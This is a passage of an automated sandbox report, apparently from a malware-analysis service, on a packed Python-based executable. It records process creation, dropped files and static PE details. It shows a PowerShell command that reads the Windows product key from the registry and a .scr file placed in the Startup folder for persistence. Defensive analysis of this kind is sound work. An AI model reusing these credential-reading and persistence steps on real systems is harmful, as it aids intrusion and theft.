              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: VCRUNTIME140.dll.0.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFA9E0350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFA9E0350
              Source: python313.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1cb64b
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1f35a
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x46d69
              Source: El9HaBFrFM.exeStatic PE information: real checksum: 0x7e87ac should be: 0x7e825f
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xdba7
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x17cae
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa8f8a
              Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x197f77
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x11959
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1a226
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1fcc8
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xdd74
              Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x4330c
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x21293
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x7797
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x15eca
              Source: 4mvljvuo.dll.57.drStatic PE information: real checksum: 0x0 should be: 0xb299
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFA93AC25 push rcx; ret 1_2_00007FFDFA93AC62
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAD4331 push rcx; ret 1_2_00007FFDFAAD4332
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB1027AE push rsp; iretd 1_2_00007FFDFB1027B9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9A23D2A5 pushad ; iretd 6_2_00007FFD9A23D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9A35564C push edi; iretd 6_2_00007FFD9A35565B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9A35861B push ebx; ret 6_2_00007FFD9A35862A
              Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 18_2_00007FFD9A3300BD pushad ; iretd 18_2_00007FFD9A3300C1
              Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 18_2_00007FFD9A330875 push cs; retf 18_2_00007FFD9A3308FF
              Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 18_2_00007FFD9A330855 push cs; retf 18_2_00007FFD9A3308FF
              Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 18_2_00007FFD9A330900 push ss; ret 18_2_00007FFD9A33093F
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Source: EmailJoeBoxAI: AI detected Typosquatting in URL: URL: https://trksyln.net
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: "C:\Users\user\Desktop\El9HaBFrFM.exe"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\select.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.dllJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3A5830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF6BA3A5830
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
